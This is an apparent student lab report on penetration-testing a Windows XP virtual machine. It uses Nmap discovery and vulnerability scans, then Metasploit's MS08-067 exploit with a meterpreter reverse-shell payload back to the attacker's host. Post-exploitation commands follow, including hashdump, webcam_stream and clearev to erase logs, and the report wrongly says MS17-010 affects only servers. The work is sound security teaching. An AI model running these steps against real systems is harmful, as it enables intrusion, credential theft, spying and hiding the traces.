Vulnerability Assessment & Penetration Testing Report on Windows XP


Vulnerability assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, applications and network infrastructures, and of providing the organization doing the assessment with the knowledge, awareness and risk background it needs to understand the threats to its environment and react appropriately.

 

This Vulnerability Assessment & Penetration Testing on Windows XP project was done by ICSS student Prashant Kumar. The full process is discussed below.

 

Project Name: Vulnerability Assessment & Penetration Testing on Windows XP

Author Name: Prashant Kumar

Publish Date: 24-07-2018

 

Introduction:

Vulnerability Assessment and Penetration Testing (VAPT) is a systematic analysis of the security status of information systems. Vulnerability assessment is an on-demand solution which makes it convenient to run tests over the Internet anywhere, anytime. It is a hybrid solution which blends automated testing with security expert analysis; the unique technology identifies all possible attack vectors. A vulnerability assessment offers only a partial evaluation of vulnerabilities; actually testing for them by penetrating barriers is a useful adjunct, as it identifies potential access paths missed by the vulnerability assessment. Penetration testing, aka “pen testing”, is the practice of testing a computer system, network or web application to find vulnerabilities that an attacker could exploit.

Vulnerability assessments and pen tests can be automated with software applications or performed manually. Either way, the process includes gathering information about the target before the test (reconnaissance), identifying possible entry points, attempting to break in (either virtually or for real) and reporting back the findings.

The main objective of penetration testing is to determine security weaknesses. A pen test can also be used to test an organization’s security policy compliance, its employees’ security awareness and the organization’s ability to identify and respond to security incidents; this is done by pen testers, aka the “Red Team”.

 

Vulnerability Assessment

Life cycle of penetration testing:

[Figure: life cycle of penetration testing]

Reconnaissance

Reconnaissance denotes the work of information gathering before any real attacks are planned. The idea is to collect as much interesting information as possible about the target. Reconnaissance is probably the longest phase, sometimes lasting weeks or months. But here we have a known target: a Windows XP machine connected to the same network as us. To find the target machine we will run an Nmap scan.

After the Nmap scan, the live hosts are shown in the screenshot below.

[Screenshot: Nmap live-host scan results]

Now we need the OS details of every system connected to the network so that we can find our target machine. So first we need to separate out the live IP addresses: we save the scan result in a text file and then filter the IP addresses out of it using the commands below.

nmap -sV -sP 192.168.31.1-255 > livehosts.txt

grep "Nmap scan report for" livehosts.txt | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' > ip.txt

The second command reads the same livehosts.txt file that the first one wrote, and it extracts the address itself rather than a whitespace-separated field, so it also works for hosts that Nmap lists with a hostname, such as “XiaoQiang (192.168.31.1)”.

The output is shown in the screenshot below.

[Screenshot: filtered live IP addresses in ip.txt]

Now we have to check which one of them is a Windows XP machine, so we will run an OS detection scan (which needs root privileges) against all the live IPs.

nmap -sV -O -iL ip.txt > osdetails.txt

And the output is:

Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-23 02:06 IST
Nmap scan report for XiaoQiang (192.168.31.1)
Host is up (0.014s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
53/tcp   open  domain  dnsmasq 2.71
80/tcp   open  http    nginx
8192/tcp open  http    Tengine httpd
8193/tcp open  http    nginx
8899/tcp open  http    Tengine httpd
MAC Address: 78:11:DC:18:76:21 (Xiaomi Electronics,co.)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

 

OS:SCAN(V=7.60%E=4%D=7/23%OT=53%CT=1%CU=41503%PV=Y%DS=1 %DC=D%G=Y%M=7811DC%T

 

OS:M=5B54EBAA%P=i686-pc-linux-gnu)SEQ(SP=0%GCD=0%ISR=0%TI=Z%CI=Z%II=I%TS=7)

 

OS:SEQ(SP=0%GCD=0%ISR=0%TI=Z%CI=Z%TS=7)OPS(O1=M5B4ST11NW 7%O2=M5B4ST11NW7%O3

 

OS:=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6= M5B4ST11)WIN(W1=3890%W2=3

 

OS:890%W3=3890%W4=3890%W5=3890%W6=3890)ECN(R=Y%DF=Y%T =40%W=3908%O=M5B4NNSNW

 

OS:7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=A%A=S+%F=AS%RD=0%Q=)T2 (R=N)T3(R=N)T4(R=Y%DF

 

OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=4 0%W=0%S=Z%A=S+%F=AR%O=

 

OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 %Q=)T7(R=N)U1(R=Y%DF=N%

 

OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G )IE(R=Y%DFI=N%T=40%CD

 

OS:=S)

 

 

Network Distance: 1 hop

Nmap scan report for 192.168.31.27
Host is up (0.016s latency).
Not shown: 999 closed ports
PORT      STATE SERVICE    VERSION
62078/tcp open  tcpwrapped
MAC Address: 88:19:08:C9:D6:A8 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

 


 

Network Distance: 1 hop

Nmap scan report for 192.168.31.224
Host is up (0.00062s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open  http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
MAC Address: 00:0C:29:BE:B1:2B (VMware)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Nmap scan report for 192.168.31.44
Host is up (0.000017s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.1
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 6 IP addresses (4 hosts up) scanned in 261.30 seconds.

 

After analyzing the scan results, the host 192.168.31.224, reported by Nmap as Microsoft Windows XP Professional SP2 (or Windows Server 2003) with SMB on 445/tcp open, is our target machine. Now that we have identified our target we will move to the next part.
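The identification step above can also be done programmatically. The following Python script is an added example and not part of the original report: it parses normal Nmap output of the kind quoted above (the sample is constructed, abridged from the osdetails.txt output in this report with the fingerprint dumps left out), handles both the bare-IP and the “hostname (IP)” forms of the scan-report line, and flags hosts fingerprinted as Windows XP that expose SMB on 445/tcp, which is the asset class a defender should patch, isolate or retire first.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: abridged from the osdetails.txt output quoted in the report above.
SAMPLE_OSDETAILS = """\
Nmap scan report for XiaoQiang (192.168.31.1)
Host is up (0.014s latency).
53/tcp open domain dnsmasq 2.71
80/tcp open http nginx
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Nmap scan report for 192.168.31.224
Host is up (0.00062s latency).
135/tcp open msrpc                Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Nmap scan report for 192.168.31.44
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
OS details: Linux 3.10 - 4.1
"""

# Matches "Nmap scan report for 192.168.31.224" and "... for XiaoQiang (192.168.31.1)":
# the hostname form is where a naive whitespace-field cut would return the name, not the IP.
HOST_RE = re.compile(r"^Nmap scan report for (?:(\S+) \()?(\d{1,3}(?:\.\d{1,3}){3})\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")  # port/proto state service version
@dataclass
class Host:
    ip: str
    hostname: str = ""
    os_details: str = ""
    open_ports: dict = field(default_factory=dict)  # port number -> "service version"

def parse_nmap(text):
    """Split normal Nmap output into one Host record per 'Nmap scan report' block."""
    hosts, cur = [], None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            cur = Host(ip=m.group(2), hostname=m.group(1) or "")
            hosts.append(cur)
        elif cur is None:
            continue  # lines before the first host block (the "Starting Nmap" banner)
        elif line.startswith("OS details:"):
            cur.os_details = line.split(":", 1)[1].strip()
        elif (p := PORT_RE.match(line)) and p.group(3) == "open":
            cur.open_ports[int(p.group(1))] = f"{p.group(4)} {p.group(5)}".strip()
    return hosts

def eol_smb_exposed(hosts):
    """IPs fingerprinted as Windows XP with SMB (445/tcp) open: end-of-life hosts reachable over SMB."""
    return [h.ip for h in hosts if "Windows XP" in h.os_details and 445 in h.open_ports]
```

Run against the sample, eol_smb_exposed returns only 192.168.31.224, the same host the report singles out; pointing it at a real osdetails.txt gives a patch-priority list for the whole subnet.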

 

 

Vulnerability scanning

 

In this part we will scan the target machine for known vulnerabilities. So again we will use Nmap, this time running its vulnerability-detection scripts against the target.

nmap -Pn --script vuln 192.168.31.224 > vuln.txt

The output is shown in the screenshot below.

[Screenshot: output of nmap --script vuln against 192.168.31.224]

The screenshot shows the list of vulnerabilities, and they are as follows:

 

|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED

This vulnerability exists, but it doesn’t provide any user access, so it can’t be used. The next one is

smb-vuln-ms08-067

This vulnerability allows a user to have remote access to the target system, and it exists on the Windows XP / 2003 machine which is our target.

Then the last one listed is

smb-vuln-ms17-010

This vulnerability also allows users to have remote access to the target system, but it is not available for the Windows XP / 2003 machine; it only exists in Windows servers.

So now we will use the ms08_067 vulnerability to exploit the machine using Metasploit.

 

 

Attack & Penetration

 

Now that we know the vulnerability, we will search for it in the Metasploit Framework database. The Metasploit Framework has a huge collection of exploits, payloads and modules which are used by the hacking community. It can be launched by typing msfconsole in the terminal.

Now we have to search for the ms08_067 vulnerability, so we will type

search ms08_067

[Screenshot: search results for ms08_067]

The description of this module is:

[Screenshot: module description]

This module is selected with the following command.

use exploit/windows/smb/ms08_067_netapi

Now the following commands are used to see the payloads of this module and to set one of them as required.

show payloads

We are going to use the ‘windows/meterpreter/reverse_tcp’ payload.

set payload windows/meterpreter/reverse_tcp

show options

set rhost 192.168.31.224   (target ip address)

set lhost 192.168.31.44  (attacker ip address)

[Screenshot: module options with RHOST and LHOST set]

Now, to get an access session with the target machine, the exploit command is used.

exploit

 

 

 

Post exploitation

 

Once we get a Meterpreter session we have full access to the target machine. We can do anything we want; for example, we can escalate privileges with the command

getsystem

To confirm, check the IP with the command

ipconfig

The following picture shows that:

[Screenshot: ipconfig output in the Meterpreter session]

 

We can see the options by typing help. Some common commands are:

sysinfo

getuid

hashdump

 

webcam_stream (If the target machine has a webcam)

download

cd

pwd

ls

reboot

When our task is completed and we no longer need the target machine, we need to clear our footprints using the command

clearev

 

 

 

Conclusion & Recommendations

 

After reviewing the vulnerability, it is clear that gaining access to the system in this way is a big security threat: our data can be misused, so the machine should be kept safe from such attacks.

This particular vulnerability was patched by Microsoft long ago, so just perform a Windows update and this vulnerability will automatically disappear.

 

Recommendations are:

  • Always keep the machine & its software updated.

  • Use a good antivirus.

  • We can use a custom firewall too.

  • Don’t install software from unknown sources.

 

 

 

 

 

…………End of the report………..

 

 
